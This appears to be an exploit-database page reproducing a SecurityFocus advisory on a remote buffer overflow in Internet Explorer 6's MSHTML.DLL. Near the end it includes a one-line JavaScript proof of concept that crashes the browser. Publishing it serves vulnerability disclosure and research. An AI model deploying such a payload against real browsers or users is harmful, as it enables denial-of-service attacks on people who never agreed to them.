header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer-Overflow
120
CWE
Product Name: Internet Explorer
Affected Version From: Internet Explorer 6
Affected Version To: Other versions may also be affected.
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2005

Microsoft Internet Explorer Remote Buffer-Overflow Vulnerability

Microsoft Internet Explorer is susceptible to a remote buffer-overflow vulnerability in 'MSHTML.DLL'. The application fails to properly bounds-check user-supplied input data before copying it into an insufficiently sized memory buffer. Remote attackers may exploit this issue to crash affected web browsers. Remote code execution may also be possible, but this has not been confirmed.

Mitigation:

Ensure that all user-supplied input is validated before being used.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17131/info

Microsoft Internet Explorer is susceptible to a remote buffer-overflow vulnerability in 'MSHTML.DLL'. The application fails to properly bounds-check user-supplied input data before copying it into an insufficiently sized memory buffer.

Remote attackers may exploit this issue to crash affected web browsers. Remote code execution may also be possible, but this has not been confirmed.

Internet Explorer 6 is vulnerable to this issue; other versions may also be affected.

The following proof of concept is available:

<script>
for(s='<a onclick=',i=0;i<8||(document.write(s+'>'));i++)s+=s;
</script>

Navigation

Suggest Exploit

Services By CQR

cqrsecured